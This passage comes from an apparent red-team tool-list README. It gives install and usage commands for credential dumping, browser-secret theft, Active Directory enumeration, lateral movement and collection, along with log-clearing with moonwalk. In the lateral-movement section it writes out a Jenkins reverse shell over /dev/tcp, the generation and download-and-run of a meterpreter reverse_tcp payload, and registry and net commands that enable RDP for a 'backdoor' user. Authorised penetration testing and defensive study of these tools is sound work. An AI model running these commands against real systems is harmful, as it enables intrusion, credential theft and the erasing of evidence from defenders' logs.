from https://github.com/optiv/ScareCrow* ### [🔙](#tool-list)[moonwalk](https://github.com/mufeedvh/moonwalk) moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine. It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell. **Install:** ```bash curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk ``` **Usage:** ```bash # Start moonwalk straight after getting a shell on the victim Linux endpoint curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk moonwalk start # Once you are finished, clear your traces moonwalk finish ``` ![image](https://user-images.githubusercontent.com/100603074/220959174-9c72922f-40cc-4843-bdc8-353cc55a3c51.png) *Image used from https://github.com/mufeedvh/moonwalk* Credential Access ==================== ### [🔙](#tool-list)[Mimikatz](https://github.com/gentilkiwi/mimikatz) Great tool for gaining access to hashed and cleartext passwords on a victims endpoint. Once you have gained privileged access to a system, drop this tool to collect some creds. **Install:** 1. Download the [mimikatz_trunk.7z](https://github.com/gentilkiwi/mimikatz/releases) file. 2. Once downloaded, the `mimikatz.exe` binary is in the `x64` folder. **Usage:** ```bash .\mimikatz.exe privilege::debug ``` ![image](https://user-images.githubusercontent.com/100603074/208253562-5c58d412-ed3e-4ab5-b8e7-11092852c3d0.png) ### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne) Nice tool for extracting locally stored passwords from browsers, databases, games, mail, git, wifi, etc. **Install: (Binary)** You can install the standalone binary from [here](https://github.com/AlessandroZ/LaZagne/releases/). **Usage:** ```bash # Launch all modes .\laZagne.exe all # Launch only a specific module .\laZagne.exe browsers # Launch only a specific software script .\laZagne.exe browsers -firefox ``` ![image](https://user-images.githubusercontent.com/100603074/208253800-48f960db-d569-4d1a-b39f-d6c7643691e2.png) ### [🔙](#tool-list)[hashcat](https://github.com/hashcat/hashcat) Tool for cracking password hashes. Supports a large list of hashing algorithms (Full list can be found [here](https://hashcat.net/wiki/doku.php?id=example_hashes)). **Install: Binary** You can install the standalone binary from [here](https://hashcat.net/hashcat/). **Usage:** ```bash .\hashcat.exe --help ``` Nice hashcat command [cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/). ![image](https://user-images.githubusercontent.com/100603074/208263419-94bf92c0-1c83-4366-a6c2-b6533fdcc521.png) ### [🔙](#tool-list)[John the Ripper](https://github.com/openwall/john) Another password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs and GPUs. **Install:** ```bash sudo apt-get install john -y ``` **Usage:** ```bash john ``` ![image](https://user-images.githubusercontent.com/100603074/208263690-8c2d1253-7261-47da-850d-ca5a8d98ca13.png) ### [🔙](#tool-list)[SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt) This tool is designed to retrieve and decrypt RunAs credentials stored within Microsoft System Center Operations Manager (SCOM) databases. NCC blog post - ['SCOMplicated? – Decrypting SCOM “RunAs” credentials'](https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/) **Pre-requisites:** To run the tool you will require administrative privileges on the SCOM server. You will also need to ensure that you have read access to the following registry key: ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins ``` You can check manually that you can see the database by gathering the connection details from the following keys: ``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName ``` **Install: (PS1)** ``` git clone https://github.com/nccgroup/SCOMDecrypt cd .\SCOMDecrypt\SCOMDecrypt\ . .\Invoke-SCOMDecrypt.ps1 ``` **Install: (Compile)** Using [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) you can compile the SCOMDecrypt binary. Open the SCOMDecrypt [project .sln](https://github.com/nccgroup/SCOMDecrypt), choose "Release", and build. **Usage:** ```bash # PS1 Invoke-SCOMDecrypt # Compiled C# binary .\SCOMDecrypt.exe ``` ![image](https://user-images.githubusercontent.com/100603074/210456718-034ba080-602e-423e-8ac3-b62ef0841208.png) *Image text used from https://github.com/nccgroup/SCOMDecrypt* ### [🔙](#tool-list)[nanodump](https://github.com/helpsystems/nanodump) The LSASS (Local Security Authority Subsystem Service) is a system process in the Windows operating system that is responsible for enforcing the security policy on the system. It is responsible for a number of tasks related to security, including authenticating users for logon, enforcing security policies, and generating audit logs. Creating a dump of this process can allow an attacker to extract password hashes or other sensitive information from the process's memory, which could be used to compromise the system further. This allows for the creation of a minidump of the LSASS process. **Install:** ```bash git clone https://github.com/helpsystems/nanodump.git ``` **Install: (Linux with MinGW)** ```bash make -f Makefile.mingw ``` **Install: (Windows with MSVC)** ```bash nmake -f Makefile.msvc ``` **Install: (CobaltStrike only)** Import the `NanoDump.cna` script on Cobalt Strike. Full installation information can be found [here](https://github.com/helpsystems/nanodump). **Usage:** ```bash # Run nanodump.x64.exe # Leverage the Silent Process Exit technique nanodump --silent-process-exit C:\Windows\Temp\ # Leverage the Shtinkering technique nanodump --shtinkering ``` Full usage information can be found [here](https://github.com/helpsystems/nanodump#1-usage). ![nanodump](https://user-images.githubusercontent.com/100603074/210985548-a5e69f62-04da-4771-b06b-720147de08d0.jpg) *Image used from https://github.com/helpsystems/nanodump* ### [🔙](#tool-list)[eviltree](https://github.com/t3l3machus/eviltree) A standalone python3 remake of the classic "tree" command with the additional feature of searching for user provided keywords/regex in files, highlighting those that contain matches. Created for two main reasons: - While searching for secrets in files of nested directory structures, being able to visualize which files contain user provided keywords/regex patterns and where those files are located in the hierarchy of folders, provides a significant advantage. - `tree` is an amazing tool for analyzing directory structures. It's really handy to have a standalone alternative of the command for post-exploitation enumeration as it is not pre-installed on every linux distro and is kind of limited on Windows (compared to the UNIX version). **Install:** ```bash git clone https://github.com/t3l3machus/eviltree ``` **Usage:** ```bash # Running a regex that essentially matches strings similar to: password = something against /var/www python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v # Using comma separated keywords instead of regex python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v ``` ![image](https://user-images.githubusercontent.com/100603074/212204831-9887b976-dee8-4520-bbd6-e6e69da711ed.png) *Image used from https://github.com/t3l3machus/eviltree* ### [🔙](#tool-list)[SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief) Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials. Will also optionally enumerate active directory users from the UDS API. [Blog - Exploiting common misconfigurations in cisco phone systems](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/) **Install:** ```bash git clone https://github.com/trustedsec/SeeYouCM-Thief python3 -m pip install -r requirements.txt ``` **Usage:** ```bash # Enumerate Active Directory users from the UDS api on the CUCM ./thief.py -H <CUCM server> --userenum # Without specifying a phone IP address the script will attempt to download every config in the listing. ./thief.py -H <Cisco CUCM Server> [--verbose] # Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet. ./thief.py --phone <Cisco IP Phoner> [--verbose] # Specify a subnet to scan with reverse lookups. ./thief.py --subnet <subnet to scan> [--verbose] ``` ![image](https://user-images.githubusercontent.com/100603074/212204860-a20c83dd-a4f7-4c6f-a760-5925d4ae1e03.png) *Image used from https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/* ### [🔙](#tool-list)[MailSniper](https://github.com/dafthack/MailSniper) MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email or by an Exchange administrator to search the mailboxes of every user in a domain. MailSniper also includes additional modules for password spraying, enumerating users and domains, gathering the Global Address List (GAL) from OWA and EWS and checking mailbox permissions for every Exchange user at an organization. Nice blog post with more information about [here](https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/). [MailSniper Field Manual](http://www.dafthack.com/files/MailSniper-Field-Manual.pdf) **Install:** ``` git clone https://github.com/dafthack/MailSniper cd MailSniper Import-Module MailSniper.ps1 ``` **Usage:** ```bash # Search current users mailbox Invoke-SelfSearch -Mailbox [email protected] ``` ![image](https://user-images.githubusercontent.com/100603074/217654320-3d74551c-e37a-4398-b354-a1ed7f982cd0.png) *Image used from https://patrowl.io/* ### [🔙](#tool-list)[SharpChromium](https://github.com/djhohnstein/SharpChromium) SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract: - Cookies (in JSON format) - History (with associated cookies for each history item) - Saved Logins This rewrite has several advantages to previous implementations, which include: - No Type compilation or reflection required - Cookies are displayed in JSON format, for easy importing into Cookie Editor. - No downloading SQLite assemblies from remote resources. - Supports major Chromium browsers (but extendable to others) **Install:** Using [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/). Open up the project .sln, choose "release", and build. **Usage:** ```bash # Retrieve cookies associated with Google Docs and Github .\SharpChromium.exe cookies docs.google.com github.com # Retrieve history items and their associated cookies. .\SharpChromium.exe history # Retrieve saved logins (Note: Only displays those with non-empty passwords): .\SharpChromium.exe logins ``` ![image](https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png) *Image used from https://github.com/djhohnstein/SharpChromium* ### [🔙](#tool-list)[dploot](https://github.com/zblurx/dploot) DPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc) we just need access to a password. dploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment. [Blog - Operational Guidance for Offensive User DPAPI Abuse](https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107) **Install: (Pip)** ```bash pip install dploot ``` **Install: (Git)** ```bash git clone https://github.com/zblurx/dploot.git cd dploot make ``` **Usage:** ```bash # Loot decrypted machine private key files as a Windows local administrator dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet # Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user) dploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet # Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints dploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet ``` Discovery ==================== ### [🔙](#tool-list)[PCredz](https://github.com/lgandx/PCredz) This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface. **Install:** ```bash git clone https://github.com/lgandx/PCredz ``` **Usage:** (PCAP File Folder) ```python python3 ./Pcredz -d /tmp/pcap-directory-to-parse/ ``` **Usage:** (Live Capture) ```python python3 ./Pcredz -i eth0 -v ``` ![image](https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png) ### [🔙](#tool-list)[PingCastle](https://github.com/vletoux/pingcastle) Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise. **Install:** (Download) ``` https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip ``` **Usage:** ```python ./PingCastle.exe ``` ![image](https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png) ### [🔙](#tool-list)[Seatbelt](https://github.com/GhostPack/Seatbelt) Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors. It is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings **Install: (Compile)** Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with [Visual Studio Community Edition](https://visualstudio.microsoft.com/downloads/). Open up the project .sln, choose "release", and build. **Usage:** ```bash # Run all checks and output to output.txt Seatbelt.exe -group=all -full > output.txt # Return 4624 logon events for the last 30 days Seatbelt.exe "LogonEvents 30" # Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.* Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true" # Run remote-focused checks against a remote system Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" ``` Full command groups and parameters can be found [here](https://github.com/GhostPack/Seatbelt#command-groups). ![image](https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png) *Image used from https://exord66.github.io/csharp-in-memory-assemblies* ### [🔙](#tool-list)[ADRecon](https://github.com/sense-of-security/adrecon) Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs. It can be run from any workstation that is connected to the environment, even hosts that are not domain members. [BlackHat USA 2018 SlideDeck](https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation) **Prerequisites** - .NET Framework 3.0 or later (Windows 7 includes 3.0) - PowerShell 2.0 or later (Windows 7 includes 2.0) **Install: (Git)** ```bash git clone https://github.com/sense-of-security/ADRecon.git ``` **Install: (Download)** You can download a zip archive of the [latest release](https://github.com/sense-of-security/ADRecon/archive/master.zip). **Usage:** ```bash # To run ADRecon on a domain member host. PS C:\> .\ADRecon.ps1 # To run ADRecon on a domain member host as a different user. PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username> # To run ADRecon on a non-member host using LDAP. PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username> # To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter) PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController <IP or FQDN> -Credential <domain\username> -Collect Domain, DomainControllers ``` Full usage and parameter information can be found [here](https://github.com/sense-of-security/adrecon#usage). ![image](https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png) *Image used from https://vk9-sec.com/domain-enumeration-powerview-adrecon/* ### [🔙](#tool-list)[adidnsdump](https://github.com/dirkjanm/adidnsdump) By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks. **Install: (Pip)** ```bash pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump ``` **Install: (Git)** ```bash git clone https://github.com/dirkjanm/adidnsdump cd adidnsdump pip install . ``` **Note:** *The tool requires `impacket` and `dnspython` to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install [impacket from GitHub](https://github.com/CoreSecurity/impacket).* **Usage:** ```bash # Display the zones in the domain where you are currently in adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp # Display all zones in the domain adidnsdump -u icorp\\testuser icorp-dc.internal.corp # Resolve all unknown records (-r) adidnsdump -u icorp\\testuser icorp-dc.internal.corp -r ``` [Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump](https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/) ![adidnsdump](https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg) *Image used from https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/* ### [🔙](#tool-list)[kerbrute](https://github.com/ropnop/kerbrute) A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. **Install: (Go)** ```bash go get github.com/ropnop/kerbrute ``` **Install: (Make)** ```bash git clone https://github.com/ropnop/kerbrute cd kerbrute make all ``` **Usage:** ```bash # User Enumeration ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt # Password Spray ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 # Brute User ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman # Brute Force ./kerbrute -d lab.ropnop.com bruteforce - ``` ![image](https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png) *Image used from https://matthewomccorkle.github.io/day_032_kerbrute/* ### [🔙](#tool-list)[scavenger](https://github.com/SpiderLabs/scavenger) Scavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as "interesting" files containing sensitive information. Scavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing. **Install:** First install CrackMapExec from [here](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation). ```bash git clone https://github.com/SpiderLabs/scavenger cd scavenger ``` **Usage:** ```bash # Search for interesting files on victim endpoint python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local ``` Nice [blog post](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/). ![image](https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png) *Image used from https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/* Lateral Movement ==================== ### [🔙](#tool-list)[crackmapexec](https://github.com/Porchetta-Industries/CrackMapExec) This is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more. **Install:** ```bash sudo apt install crackmapexec ``` **Usage:** ```bash crackmapexec smb <ip address> -d <domain> -u <user list> -p <password list> ``` ![image](https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png) ### [🔙](#tool-list)[WMIOps](https://github.com/FortyNorthSecurity/WMIOps) WMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment. Developed by [@christruncer](https://twitter.com/christruncer). Original [blog post](https://www.christophertruncer.com/introducing-wmi-ops/) documenting release. **Install: (PowerShell)** ```bash git clone https://github.com/FortyNorthSecurity/WMIOps Import-Module WMIOps.ps1 ``` **Usage:** ```bash # Executes a user specified command on the target machine Invoke-ExecCommandWMI # Returns all running processes from the target machine Get-RunningProcessesWMI # Checks if a user is active at the desktop on the target machine (or if away from their machine) Find-ActiveUsersWMI # Lists all local and network connected drives on target system Get-SystemDrivesWMI # Executes a powershell script in memory on the target host via WMI and returns the output Invoke-RemoteScriptWithOutput ``` ![image](https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png) ![image](https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png) *Images used from https://pentestlab.blog/2017/11/20/command-and-control-wmi/* ### [🔙](#tool-list)[PowerLessShell](https://github.com/Mr-Un1k0d3r/PowerLessShell) Tool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. **Install:** ```bash git clone https://github.com/Mr-Un1k0d3r/PowerLessShell cd PowerLessShell ``` **Usage:** ```bash # Help python PowerLessShell.py -h # Generate PowerShell payload python PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj # Generating a shellcode payload python PowerLessShell.py -source shellcode.raw -output malicious.csproj ``` Full usage information can be found [here](https://github.com/Mr-Un1k0d3r/PowerLessShell#usage). ![image](https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png) *Image used from https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628* ### [🔙](#tool-list)[PsExec](https://learn.microsoft.com/en-us/sysinternals/downloads/psexec) PsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems. It is great for remotely executing commands on target machines. **Note:** Some AVs detect PsExec as a 'remote admin' virus. **Install: (PowerShell)** ```bash Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip' Expand-Archive -Path 'pstools.zip' -DestinationPath "$env:TEMP\pstools" Move-Item -Path "$env:TEMP\pstools\psexec.exe" . Remove-Item -Path "$env:TEMP\pstools" -Recurse ``` **Usage:** ```bash # Prevent the license agreement from being displayed psexec.exe /accepteula # Run the 'hostname' command on remote machine psexec.exe \\REMOTECOMPUTER hostname # Run the 'hostname' command on EVERYTHING (on the domain) psexec.exe \\* hostname # Run a local executable on a remote machine psexec.exe \\REMOTECOMPUTER -c C:\Tools\program.exe # Run the 'hostname' command with different credentials psexec.exe \\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word # Spawn shell on remote machine psexec.exe -s \\REMOTECOMPUTER cmd ``` Great [blog post](https://adamtheautomator.com/psexec/) on PsExec usage. ![image](https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png) *Image used from https://adamtheautomator.com/psexec/* ### [🔙](#tool-list)[LiquidSnake](https://github.com/RiccardoAncarani/LiquidSnake) Liquid Snake is a program aimed at performing lateral movement against Windows systems without touching the disk. The tool relies on WMI Event Subscription in order to execute a .NET assembly in memory, the .NET assembly will listen for a shellcode on a named pipe and then execute it using a variation of the thread hijacking shellcode injection. The project is composed by two separate solutions: - `CSharpNamedPipeLoader` - the component that will be transformed in VBS via GadgetToJScript - `LiquidSnake` - the component responsible to creating the WMI Event Subscription on the remote system **Install:** Open both solutions in Visual Studio and build. *Make sure to target x64 architecture for the `CSharpNamedPipeLoader`.* Output: Two separate EXEs: `CSharpNamedPipeLoader.exe` and `LiquidSnake.exe` Full build information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#building). **Usage:** Use `LiquidSnake.exe` agains a host where you have administrative access over as follows: ```bash LiquidSnake.exe <host> [<username> <password> <domain>] LiquidSnake.exe dc01.isengard.local LiquidSnake.exe dc01.isengard.local saruman DeathToFrodo123 isengard.local ``` If everything went fine, you should obtain an output similar as the following: ```bash [*] Event filter created. [*] Event consumer created. [*] Subscription created, now sleeping [*] Sending some DCOM love.. [*] Sleeping again... long day ``` General usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake#usage). Full `LiquidSnake` usage information can be found [here](https://github.com/RiccardoAncarani/LiquidSnake/tree/main/LiquidSnake). ![LiquidSnake](https://user-images.githubusercontent.com/100603074/210986763-2ffe49dd-597b-4ca2-a3ad-674b5fe39624.jpg) *Image used from https://github.com/RiccardoAncarani/LiquidSnake#usage* ### [🔙](#tool-list)Enabling RDP ```shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall set rule group="remote desktop" new enable=Yes net localgroup "Remote Desktop Users" "backdoor" /add ``` ### [🔙](#tool-list)Upgrading shell to meterpreter Shells (https://infinitelogins.com/tag/payloads/) After getting basic shell access to an endpoint a meterpreter is nicer to continue with. **[attacker]** Generate a meterpreter shell: ```shell msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf ``` ![image](https://user-images.githubusercontent.com/100603074/193451669-ff745cf6-e103-4f7e-a266-f7f224dfbb0a.png) **[victim]** Download to victim endpoint: ```shell powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"` ``` **[attacker]** Configure listener: ```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run` ``` **[victim]** Execute payload: ```shell Start-Process "shell-name.exe"` ``` ![image](https://user-images.githubusercontent.com/100603074/193452305-91b769a7-96c4-43d3-b3e2-6e31b3afec27.png) ### [🔙](#tool-list)Forwarding Ports Sometimes, after gaining access to an endpoint there are local ports. Making these internal ports external routable can help for lateral movement to other services on the host. ```bash socat TCP-LISTEN:8888,fork TCP:127.0.0.1:80 & socat TCP-LISTEN:EXTERNAL_PORT,fork TCP:127.0.0.1:INTERNAL_PORT & ``` ### [🔙](#tool-list)Jenkins reverse shell If you gain access to a jenkins script console you can use this to gain a reverse shell on the node. ```jenkins r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP_ADDRESS/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ### [🔙](#tool-list)[ADFSpoof](https://github.com/mandiant/ADFSpoof) Created by Doug Bienstock [@doughsec](https://twitter.com/doughsec) while at Mandiant FireEye. ADFSpoof has two main functions: 1. Given the EncryptedPFX blob from the AD FS configuration database and DKM decryption key from Active Directory, produce a usable key/cert pair for token signing. 2. Given a signing key, produce a signed security token that can be used to access a federated application. This tool is meant to be used in conjunction with ADFSDump. ADFSDump runs on an AD FS server and outputs important information that you will need to use ADFSpoof. **Install:** **Note:** *ADFSpoof requires the installation of a custom fork of the Python Cryptography package, available [here](https://github.com/dmb2168/cryptography).* ```bash git clone https://github.com/mandiant/ADFSpoof pip install -r requirements.txt ``` **Usage:** ```bash # Decrypt the EncryptedPFX and write to disk python ADFSpoof.py -b EncryptedPfx.bin DKMkey.bin dump # Generate a security token for Office365 python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s sts.doughcorp.com o365 --upn [email protected] --objectguid {1C1D4BA4-B513-XXX-XXX-3308B907D759 ``` Full usage information can be found [here](https://github.com/mandiant/ADFSpoof#usage). Additional command examples can be found [here](https://github.com/mandiant/ADFSpoof#examples). ![image](https://user-images.githubusercontent.com/100603074/211530527-02e63fe3-5dda-4a81-8895-c140aec4eeca.png) *Image used from https://github.com/mandiant/ADFSpoof#usage* ### [🔙](#tool-list)[Coercer](https://github.com/p0dalirius/Coercer) A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods. Features: - Lists open SMB pipes on the remote machine (in modes scan authenticated and fuzz authenticated) - Tries to connect on a list of known SMB pipes on the remote machine (in modes scan unauthenticated and fuzz unauthenticated) - Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine. - Random UNC paths generation to avoid caching failed attempts (all modes) - Configurable delay between attempts with --delay More feature information [here](https://github.com/p0dalirius/Coercer#features). **Install: (pip)** ```bash sudo python3 -m pip install coercer ``` **Usage:** ```bash # Scan mode (Assess the Remote Procedure Calls listening on a machine) ./Coercer.py scan -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Coerce mode (Exploit the Remote Procedure Calls on a remote machine to coerce an authentication to ntlmrelay or responder) ./Coercer.py coerce -l 192.168.1.2 -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v # Fuzz mode (Fuzz Remote Procedure Calls listening on a machine) ./Coercer.py fuzz -t 192.168.1.1 -u 'username' -p 'password' -d test.locl -v ``` ![image](https://user-images.githubusercontent.com/100603074/216737001-3195a6c4-3d41-431d-88ce-ed35ed474d33.png) *Image used from https://github.com/p0dalirius/Coercer#quick-start* Collection ==================== ### [🔙](#tool-list)[BloodHound](https://github.com/BloodHoundAD/BloodHound) An application used to visualize active directory environments. A quick way to visualise attack paths and understand victims' active directory properties. **Install:** [PenTestPartners Walkthrough](https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/) **Custom Queries:** [CompassSecurity BloodHoundQueries](https://github.com/CompassSecurity/BloodHoundQueries) ![image](https://user-images.githubusercontent.com/100603074/206549387-a63e5f0e-aa75-47f6-b51a-942434648ee2.png) ### [🔙](#tool-list)[Snaffler](https://github.com/SnaffCon/Snaffler) Snaffler is an advanced credential scanner/collector for Active Directory environments. *With a great [README](https://github.com/SnaffCon/Snaffler/blob/master/README.md)*. Snaffler uses a system of "classifiers", each of which examine shares or folders or files or file contents, passing some items downstream to the next classifier, and discarding others. Each classifier uses a set of rules to decide what to do with the items it classifies. *More information about Snaffler [rules](https://github.com/SnaffCon/Snaffler#i-am-a-mighty-titan-of-tedium-a-master-of-the-mundane-i-wish-to-write-my-own-ruleset).* '*Broadly speaking - it gets a list of Windows computers from Active Directory, then spreads out its snaffly appendages to them all to figure out which ones have file shares, and whether you can read them.*' - Snaffler README (2023) **Install:** You can download the binary from the [GitHub Releases Page](https://github.com/SnaffCon/Snaffler/releases). **Usage:** ```bash # Targeted local scan (less likely to trigger detections) Snaffler.exe -s -i C:\ # Go in loud and find everything snaffler.exe -s -o snaffler.log ``` ![image](https://user-images.githubusercontent.com/100603074/210266420-a658a48e-2945-4d06-9aff-e3fb14664829.png) *Image used from https://github.com/SnaffCon/Snaffler#what-does-it-look-like* ### [🔙](#tool-list)[linWinPwn](https://github.com/lefayjey/linWinPwn) linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. The script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others. linWinPwn is particularly useful when you have access to an Active Directory environment for a limited time only, and you wish to automate the enumeration process and collect evidence efficiently. **Install:** ```bash git clone https://github.com/lefayjey/linWinPwn cd linWinPwn; chmod +x linWinPwn.sh chmod +x install.sh ./install.sh ``` 